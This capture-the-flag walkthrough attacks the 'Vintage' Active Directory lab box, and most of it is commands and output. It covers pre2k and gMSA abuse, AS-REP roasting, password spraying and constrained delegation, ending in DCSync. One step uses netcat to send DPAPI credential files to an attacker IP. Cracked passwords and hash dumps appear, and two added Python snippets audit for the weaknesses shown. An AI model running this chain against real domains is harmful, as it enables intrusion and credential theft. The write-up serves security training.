Basic info

As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
Port scan

No web ports, just the usual domain ports:

```
$ nmap -sC -sV -Pn 10.10.11.45
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-02 13:45 CST
Nmap scan report for 10.10.11.45
Host is up (0.074s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-02 05:32:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-12-02T05:32:46
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: -13m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds
```
bloodhound

Since we were given an initial account and password, add the hosts entry and run BloodHound first (the scan showed a clock skew of about -13m, hence the faketime prefix on every Kerberos command):

```
10.10.11.45 vintage.htb dc01.vintage.htb

faketime -f "-13m" bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -c All --zip --dns-tcp -ns 10.10.11.45
```

BloodHound shows no direct path for now.

users.txt

The user list can be compiled from BloodHound, or like this:

```
faketime -f "-13m" nxc smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
gMSA01$
FS01$
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm
```
pre2k

Here a computer was joined with "Assign this computer account as a pre-Windows 2000 computer" checked, which makes the account's password the hostname automatically:

Using this, FS01 is found and a ccache is saved:

```
faketime -f "-13m" pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile ../users.txt -verbose

[14:24:44] INFO VALID CREDENTIALS: vintage.htb\FS01$:fs01
```
FS01 to GMSA

Next, work with the fs01 ticket obtained above:

```
export KRB5CCNAME=FS01\$.ccache
```

According to BloodHound, fs01 is a member of Domain Computers, which can read the gMSA password:

Reading the gMSA gives the NT hash of gmsa01$:

```
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

54311f0ed05b807a7aaf5943b595f224
```
GMSA01

Then request a ticket for gmsa01 for the following steps:

```
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/'GMSA01$' -hashes :54311f0ed05b807a7aaf5943b595f224
export KRB5CCNAME=GMSA01\$.ccache
```

gmsa01 has GenericWrite over SERVICEMANAGERS:

So we can act on this group, for example add users to it.

SERVICEMANAGERS in turn has GenericAll over several svc accounts, so we can modify their attributes; among the users there is a disabled SVC_SQL, so we can re-enable that disabled account:

SERVICEMANAGERS

First add a user to the SERVICEMANAGERS group:

```
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
```

SVC_XXX

Then use the P.Rosa account we just added to modify the svc accounts:

```
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/P.Rosa:Rosaisbest123
export KRB5CCNAME=P.Rosa.ccache

# set the accounts to not require preauth, for AS-REP roasting afterwards
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

# enable SVC_SQL
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE
```
asrep roast

With pre-authentication now disabled on those accounts, the next step is AS-REP roasting:

```
faketime -f "-13m" python3 examples/GetNPUsers.py -request -format hashcat -usersfile users.txt vintage.htb/
```
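Both the pre2k step and the userAccountControl changes above come down to bits in the userAccountControl attribute, so the same state an attacker creates is also what a defender can audit for. The following is an added example (not part of the original writeup) that decodes that attribute and flags the conditions used on this box: accounts with Kerberos pre-authentication disabled (AS-REP roastable), pre-Windows 2000 style computer accounts, and disabled accounts left in place. The flag values are the documented Microsoft userAccountControl bits; the directory entries are constructed to mirror the writeup's accounts, and the assumption that a pre-created computer account carries WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD (0x1020) is marked in the code.

```python
# Added example, not from the original writeup: decode userAccountControl and
# flag the account states this box relied on. Flag values are the documented
# Microsoft userAccountControl bits; the entries below are constructed.

UF_ACCOUNTDISABLE = 0x0002
UF_PASSWD_NOTREQD = 0x0020
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_PASSWD_NOTREQD: "PASSWD_NOTREQD",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    UF_SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQ_PREAUTH",
}

# Constructed (sAMAccountName, userAccountControl) pairs modelled on the writeup:
# SVC_SQL as it was before being re-enabled, SVC_ARK after DONT_REQ_PREAUTH was
# added, FS01$ as a pre-created computer account, DC01$ as the domain controller.
SAMPLE_ENTRIES = [
    ("P.Rosa", 0x200),
    ("SVC_SQL", 0x202),
    ("SVC_ARK", 0x400200),
    ("FS01$", 0x1020),
    ("DC01$", 0x2000),
]


def decode_uac(value):
    """Return the names of the known flag bits set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]


def audit_entry(uac):
    """Return the findings for a single userAccountControl value."""
    findings = []
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("AS-REP roastable: Kerberos pre-authentication not required")
    # Assumption: a computer account created with the "pre-Windows 2000" option
    # carries WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD (0x1020) and keeps the
    # lowercase hostname as its initial password, as the pre2k step showed.
    if uac & UF_WORKSTATION_TRUST_ACCOUNT and uac & UF_PASSWD_NOTREQD:
        findings.append("pre-Windows 2000 computer account: password may still be the lowercase hostname")
    if uac & UF_ACCOUNTDISABLE:
        findings.append("disabled account still present: anyone with GenericAll over it can re-enable it")
    return findings


def audit_directory(entries):
    """Map every account that has at least one finding to its list of findings."""
    report = {}
    for sam, uac in entries:
        findings = audit_entry(uac)
        if findings:
            report[sam] = findings
    return report


if __name__ == "__main__":
    for sam, uac in SAMPLE_ENTRIES:
        print(f"{sam:10} 0x{uac:06x} {', '.join(decode_uac(uac))}")
    for sam, findings in audit_directory(SAMPLE_ENTRIES).items():
        for finding in findings:
            print(f"[!] {sam}: {finding}")
```

In a real environment the pairs would come from an LDAP query for sAMAccountName and userAccountControl; the audit logic stays the same, and a change of SVC_SQL from 0x202 to 0x400200 between two runs is exactly the sequence performed above.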
Crack the resulting hash to get svc_sql's password:

```
sudo hashcat -m 18200 hash.txt ~/Tools/dict/rockyou.txt

Zer0the0ne
```
C.Neri & user flag

Spraying the cracked password shows that C.Neri uses the same one:

```
faketime -f "-13m" ./kerbrute_darwin_amd64 --dc vintage.htb -d vintage.htb -v passwordspray users.txt Zer0the0ne

2024/12/02 15:04:56 > [+] VALID LOGIN: svc_sql@vintage.htb:Zer0the0ne
2024/12/02 15:04:56 > [+] VALID LOGIN: C.Neri@vintage.htb:Zer0the0ne
```

Then log in with those credentials. Since only Kerberos authentication is accepted, the krb5 config file needs adjusting:

```
# switched to Kali for this part, macOS had some issues
sudo ntpdate -s 10.10.11.45

impacket-getTGT vintage.htb/C.Neri:Zer0the0ne
export KRB5CCNAME=C.Neri.ccache

sudo nano /etc/krb5.conf
evil-winrm -i dc01.vintage.htb -r vintage.htb
```

krb5.conf

```
[libdefaults]
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
    }

[domain_realm]
    vintage.htb = VINTAGE.HTB
    .vintage.htb = VINTAGE.HTB
```
C.Neri_ADM

Looking at the users, C.Neri also has an adm account.

DPAPI

This simulates a real-world scenario: the same person uses a regular account day to day and switches to an admin account for privileged work, but saved the credentials for convenience. Standard DPAPI.

The machine has AV, though, so download the relevant files and work on them locally:

```
*Evil-WinRM* PS C:\Users\C.Neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> Get-ChildItem -Force

cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"
cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"
```

Then decrypt the DPAPI blobs locally:

```
python3 ~/Tools/impacket/impacket_main/examples/dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne

python3 ~/Tools/impacket/impacket_main/examples/dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

Username    : vintage\c.neri_adm
Unknown     : Uncr4ck4bl3P4ssW0rd0312
```
DELEGATEDADMINS

Next, work as c.neri_adm:

```
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312
export KRB5CCNAME=c.neri_adm.ccache
```

This account has GenericWrite over the DELEGATEDADMINS group, so we can add users to it:

So if we add an svc user that has an SPN set, it can impersonate other users through delegation. L.BIANCHI_ADM also has DCSync rights, which makes it our target user:

add svc to DELEGATEDADMINS

```
# using the SERVICEMANAGERS ticket from earlier
export KRB5CCNAME=P.Rosa.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k set object 'SVC_SQL' servicePrincipalName -v "cifs/x"

# using c.neri_adm
export KRB5CCNAME=c.neri_adm.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
```

impersonate & dcsync

Then use svc_sql to impersonate L.BIANCHI_ADM:

```
# if svc_sql has been automatically disabled again, re-enable it first
# run the whole sequence quickly
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/svc_sql:Zer0the0ne
export KRB5CCNAME=svc_sql.ccache

faketime -f "-13m" python3 examples/getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

# dcsync
faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -just-dc-user Administrator -k -no-pass

468c7497513f8243b59980f2240a10de
```
root flag

Administrator cannot actually log in, so keep using L.BIANCHI_ADM:

```
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
faketime -f "-13m" python3 examples/wmiexec.py L.BIANCHI_ADM@dc01.vintage.htb -k -no-pass
```

hashdump

```
faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -k -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:b0e2eccf559f2be2120e9bce41a51e2c:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
```
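The dump above makes the password reuse that carried this box visible at a glance: C.Neri and svc_sql share one NT hash, and G.Viola and svc_ark share another. The following is an added example (not part of the original writeup) of the check a defender would run over such an export during a password audit: it parses secretsdump-style lines, groups accounts by NT hash to find reuse, and lists accounts holding the well-known empty-password hash. The sample text is this writeup's own dump, with the stray spaces before the colon on the computer accounts removed.

```python
# Added example, not from the original writeup: audit a secretsdump-style NTDS
# export for NT hash reuse across accounts and for empty passwords.
import re
from collections import defaultdict

# NT hash of the empty password (MD4 over the empty UTF-16LE string)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:rid:lmhash:nthash:::  (the \s* tolerates "DC01$ :1002" style extraction spacing)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+?)\s*:(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Sample input: the dump shown in this writeup.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:b0e2eccf559f2be2120e9bce41a51e2c:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
"""


def parse_secretsdump(text):
    """Return (user, rid, nthash) tuples for every line that matches the dump format."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["nt"]))
    return rows


def find_hash_reuse(rows):
    """Map each NT hash shared by two or more accounts to those accounts (empty password excluded)."""
    by_hash = defaultdict(list)
    for user, _rid, nt in rows:
        by_hash[nt].append(user)
    return {nt: users for nt, users in by_hash.items() if len(users) > 1 and nt != EMPTY_NT}


def find_empty_passwords(rows):
    """Return the accounts whose NT hash is that of the empty password."""
    return [user for user, _rid, nt in rows if nt == EMPTY_NT]


if __name__ == "__main__":
    rows = parse_secretsdump(SAMPLE_DUMP)
    for nt, users in find_hash_reuse(rows).items():
        print(f"[!] shared NT hash {nt}: {', '.join(users)}")
    for user in find_empty_passwords(rows):
        print(f"[!] empty password: {user}")
```

The two reuse groups it reports are exactly the pivot used above (svc_sql to C.Neri) and a second one (svc_ark to G.Viola) that the writeup did not need; a shared hash between a service account and a person's account is the pattern worth alerting on.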
Last updated: 2025-05-02 17:51:51